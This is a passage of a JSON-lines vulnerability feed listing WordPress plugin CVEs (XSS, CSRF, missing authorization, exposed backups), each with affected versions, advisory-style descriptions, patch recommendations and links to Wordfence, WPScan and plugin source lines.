disabled.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/quiz-organizer\\\/trunk\\\/src\\\/includes\\\/admin\\\/admin-modify-quiz.php#L230\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/quiz-organizer\\\/trunk\\\/src\\\/includes\\\/admin\\\/admin-modify-quiz.php#L230\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/quiz-organizer\\\/trunk\\\/src\\\/includes\\\/admin\\\/admin-modify-quiz.php#L570\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/quiz-organizer\\\/trunk\\\/src\\\/includes\\\/admin\\\/admin-modify-quiz.php#L570\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/quiz-organizer\\\/trunk\\\/src\\\/includes\\\/sets\\\/class-qzorg-plug-shortcode.php#L508\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/quiz-organizer\\\/trunk\\\/src\\\/includes\\\/sets\\\/class-qzorg-plug-shortcode.php#L508\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/quiz-organizer\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/quiz-organizer\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/651646b0-231f-401c-9f6d-d414609bd7ba?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/651646b0-231f-401c-9f6d-d414609bd7ba?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1486","slug":"wowpth","versionImpact":"2.0","description":"The WoWPth WordPress plugin through 2.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/182ecda8-3385-4f9f-a917-efdeb237247c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/182ecda8-3385-4f9f-a917-efdeb237247c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4222","slug":"database-toolset","versionImpact":"1.8.4","description":"The Database Toolset plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.8.4 via backup files stored in a publicly accessible location. This makes it possible for unauthenticated attackers to extract sensitive data from database backup files. An index file is present, so a brute force attack would need to be successful in order to compromise any data.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/database-toolset\\\/trunk\\\/admin\\\/class-database-toolset-admin.php#L247\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/database-toolset\\\/trunk\\\/admin\\\/class-database-toolset-admin.php#L247\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/database-toolset\\\/trunk\\\/admin\\\/class-database-toolset-backup.php#L76\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/database-toolset\\\/trunk\\\/admin\\\/class-database-toolset-backup.php#L76\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fa452a9a-9e26-41a1-8dea-4bafaf735bee?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fa452a9a-9e26-41a1-8dea-4bafaf735bee?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4586","slug":"irm-newsroom","versionImpact":"1.2.17","description":"The IRM Newsroom plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'irmcalendarview' shortcode in all versions up to, and including, 1.2.17 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/irm-newsroom\\\/trunk\\\/irm-newsroom.php#L467\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/irm-newsroom\\\/trunk\\\/irm-newsroom.php#L467\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c6210c35-31d7-4a8d-b34f-596977c7a33e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c6210c35-31d7-4a8d-b34f-596977c7a33e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0968","slug":"watu","versionImpact":"3.3.9","description":"The Watu Quiz plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018dn\u2019, 'email', 'points', and 'date' parameters in versions up to, and including, 3.3.9 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/watu\\\/trunk\\\/views\\\/takings.php#L31\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/watu\\\/trunk\\\/views\\\/takings.php#L31\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6341bdcc-c99f-40c3-81c4-ad90ff19f802\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6341bdcc-c99f-40c3-81c4-ad90ff19f802\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36716","slug":"wp-security-audit-log","versionImpact":"4.0.1","description":"The WP Activity Log plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the setup_page function in versions up to, and including, 4.0.1. This makes it possible for unauthenticated attackers to run the setup wizard (if it has not been run previously) and access plugin configuration options.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/vulnerabilities-fixed-in-wordpress-wp-security-audit-log-plugin\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/vulnerabilities-fixed-in-wordpress-wp-security-audit-log-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2252006\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2252006\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9d0a8be3-6630-4cf7-b6cb-cdc86b99acb3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9d0a8be3-6630-4cf7-b6cb-cdc86b99acb3?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-39992","slug":"meeting-scheduler-by-vcita","description":"Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in vCita.Com Online Booking & Scheduling Calendar for WordPress by vcita plugin <=\u00a04.3.2 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/meeting-scheduler-by-vcita\\\/wordpress-online-booking-scheduling-calendar-for-wordpress-by-vcita-plugin-4-3-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/meeting-scheduler-by-vcita\\\/wordpress-online-booking-scheduling-calendar-for-wordpress-by-vcita-plugin-4-3-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3946","slug":"wp-todo","versionImpact":"1.3.0","description":"The WP To Do plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.3.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de648bea-35c5-4611-aa2f-79e37a0299bb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de648bea-35c5-4611-aa2f-79e37a0299bb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-todo\\\/trunk\\\/inc\\\/Base\\\/Model.php#L304\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-todo\\\/trunk\\\/inc\\\/Base\\\/Model.php#L304\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3966","slug":"pray-for-me","versionImpact":"1.0.4","description":"The Pray For Me WordPress plugin through 1.0.4 does not sanitise and escape some parameters, which could unauthenticated visitors to perform Cross-Site Scripting attacks that trigger when an admin visits the Prayer Requests in the WP Admin","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9f0a575f-862d-4f2e-8d25-82c6f58dd11a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9f0a575f-862d-4f2e-8d25-82c6f58dd11a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4102","slug":"elfsight-pricing-table","versionImpact":"2.0.1","description":"The Pricing Table plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the ajax() function in all versions up to, and including, 2.0.1. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform unauthorized actions like editing pricing tables.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa769d51-8718-42e9-9070-0b878442dbc7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa769d51-8718-42e9-9070-0b878442dbc7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elfsight-pricing-table\\\/trunk\\\/core\\\/includes\\\/widgets-api.php#L71\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elfsight-pricing-table\\\/trunk\\\/core\\\/includes\\\/widgets-api.php#L71\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7100","slug":"bold-page-builder","versionImpact":"5.0.2","description":"The Bold Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's bt_bb_button shortcode in all versions up to, and including, 5.0.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4999bbf3-3dbd-4c9a-b648-744192c9586c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4999bbf3-3dbd-4c9a-b648-744192c9586c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bold-page-builder\\\/trunk\\\/content_elements\\\/bt_bb_button\\\/bt_bb_button.php#L155\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bold-page-builder\\\/trunk\\\/content_elements\\\/bt_bb_button\\\/bt_bb_button.php#L155\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bold-page-builder\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bold-page-builder\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3127440\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3127440\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6927","slug":"viral-signup","versionImpact":"2.1","description":"The Viral Signup  WordPress plugin through 2.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/05024ff5-4c7a-4941-8dae-c1a8d2d4e202\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/05024ff5-4c7a-4941-8dae-c1a8d2d4e202\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8546","slug":"elementskit-lite","versionImpact":"3.2.7","description":"The ElementsKit Elementor addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Video widget in all versions up to, and including, 3.2.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d21aeeb6-2e7d-426e-82c5-ff65e33bc5cb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d21aeeb6-2e7d-426e-82c5-ff65e33bc5cb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/elementskit-lite\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/elementskit-lite\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementskit-lite\\\/trunk\\\/widgets\\\/video\\\/parts\\\/video-button.php#L10\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elementskit-lite\\\/trunk\\\/widgets\\\/video\\\/parts\\\/video-button.php#L10\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3155880\\\/elementskit-lite\\\/trunk\\\/widgets\\\/video\\\/video.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3155880\\\/elementskit-lite\\\/trunk\\\/widgets\\\/video\\\/video.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3155880\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3155880\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11197","slug":"lock-user-account","versionImpact":"1.0.5","description":"The Lock User Account plugin for WordPress is vulnerable to user lock bypass in all versions up to, and including, 1.0.5. This is due to permitting application password logins when user accounts are locked. This makes it possible for authenticated attackers, with existing application passwords, to interact with the vulnerable site via an API such as XML-RPC or REST despite their account being locked.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/lock-user-account\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/lock-user-account\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/63374c5c-0b0a-4091-9aee-2e6c1d17a1b2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/63374c5c-0b0a-4091-9aee-2e6c1d17a1b2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10320","slug":"cookielay","versionImpact":"1.2.0","description":"The Cookielay plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's cookielay shortcode in all versions up to, and including, 1.2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cookielay\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cookielay\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e014aa5-4fdf-458b-a975-e3ced7186dc2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e014aa5-4fdf-458b-a975-e3ced7186dc2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12512","slug":"ask-me-anything-anonymously","versionImpact":"1.6","description":"The Ask Me Anything (Anonymously) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'askmeanythingpeople' shortcode in all versions up to, and including, 1.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ask-me-anything-anonymously\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ask-me-anything-anonymously\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f204d39-8a4a-4008-adc6-3ba72531f5a2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f204d39-8a4a-4008-adc6-3ba72531f5a2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1436","slug":"limit-bio","versionImpact":"1.0","description":"The Limit Bio WordPress plugin through 1.0 does not have CSRF check when updating its settings, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/849ed0a0-be17-43cf-a3a1-ad54dfb33d57\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/849ed0a0-be17-43cf-a3a1-ad54dfb33d57\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4199","slug":"abundatrade-plugin","versionImpact":"1.8.02","description":"The Abundatrade Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.8.02. This is due to missing or incorrect nonce validation on the 'abundatrade' page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/abundatrade-plugin\\\/tags\\\/1.8.02\\\/abundatrade_pugin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/abundatrade-plugin\\\/tags\\\/1.8.02\\\/abundatrade_pugin.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/abundatrade-plugin\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/abundatrade-plugin\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ef828667-f241-4c5c-92a8-0a4f366e190f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ef828667-f241-4c5c-92a8-0a4f366e190f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4585","slug":"irm-newsroom","versionImpact":"1.2.17","description":"The IRM Newsroom plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'irmflat' shortcode in all versions up to, and including, 1.2.17 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/irm-newsroom\\\/trunk\\\/irm-newsroom.php#L439\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/irm-newsroom\\\/trunk\\\/irm-newsroom.php#L439\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0da6d357-e55f-4bf6-9cd7-50e3dc712434?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0da6d357-e55f-4bf6-9cd7-50e3dc712434?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7669","slug":"avishi-wp-paypal-payment-button","versionImpact":"2.0","description":"The Avishi WP PayPal Payment Button plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0. This is due to missing or incorrect nonce validation on the 'avishi-wp-paypal-payment-button\/index.php' page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/avishi-wp-paypal-payment-button\\\/trunk\\\/index.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/avishi-wp-paypal-payment-button\\\/trunk\\\/index.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/avishi-wp-paypal-payment-button\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/avishi-wp-paypal-payment-button\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8416b394-28ae-41de-8784-2ae39f4d201f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8416b394-28ae-41de-8784-2ae39f4d201f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7507","slug":"elink-embed-content","versionImpact":"1.1.0","description":"The elink \u2013 Embed Content plugin for WordPress is vulnerable to Malicious Redirect in all versions up to, and including, 1.1.0. This is due to the plugin not restricting URLS that can be supplied through the elink shortcode. This makes it possible for authenticated attackers, with Contributor-level access and above, to supply an HTML file that can be leverged to redirect users to a malicious domain.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/elink-embed-content\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/elink-embed-content\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bda249f7-07a9-47ba-bba4-85abd8f8a207?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bda249f7-07a9-47ba-bba4-85abd8f8a207?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1421","slug":"ht-mega-for-elementor","versionImpact":"2.4.4","description":"The HT Mega \u2013 Absolute Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018border_type\u2019 attribute of the Post Carousel widget in all versions up to, and including, 2.4.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a71cbe66-4187-4260-bb87-8579bc6e75f5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a71cbe66-4187-4260-bb87-8579bc6e75f5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/tags\\\/2.4.4\\\/includes\\\/widgets\\\/htmega_post_carousel.php#L2243\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ht-mega-for-elementor\\\/tags\\\/2.4.4\\\/includes\\\/widgets\\\/htmega_post_carousel.php#L2243\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3945","slug":"wp-todo","versionImpact":"1.3.0","description":"The WP To Do plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.0. This is due to missing or incorrect nonce validation on the wptodo_manage() function. This makes it possible for unauthenticated attackers to add new todo items via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/69475bec-1f27-4793-8697-1132ac701c62?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/69475bec-1f27-4793-8697-1132ac701c62?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-todo\\\/trunk\\\/inc\\\/Base\\\/Model.php#L273\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-todo\\\/trunk\\\/inc\\\/Base\\\/Model.php#L273\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3965","slug":"pray-for-me","versionImpact":"1.0.4","description":"The Pray For Me WordPress plugin through 1.0.4 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0e1ba2b3-5849-42f6-b503-8b3b520e4a79\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0e1ba2b3-5849-42f6-b503-8b3b520e4a79\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4100","slug":"elfsight-pricing-table","versionImpact":"2.0.1","description":"The Pricing Table plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0.1. This is due to missing or incorrect nonce validation on the ajax() function. This makes it possible for unauthenticated attackers to perform a variety of actions related to managing pricing tables via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4cb3d2d4-256c-4128-9397-8b9c7be1b9c8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4cb3d2d4-256c-4128-9397-8b9c7be1b9c8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elfsight-pricing-table\\\/trunk\\\/core\\\/includes\\\/widgets-api.php#L71\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elfsight-pricing-table\\\/trunk\\\/core\\\/includes\\\/widgets-api.php#L71\",\"refsource\":\"\",\"tags\":[]}]"}
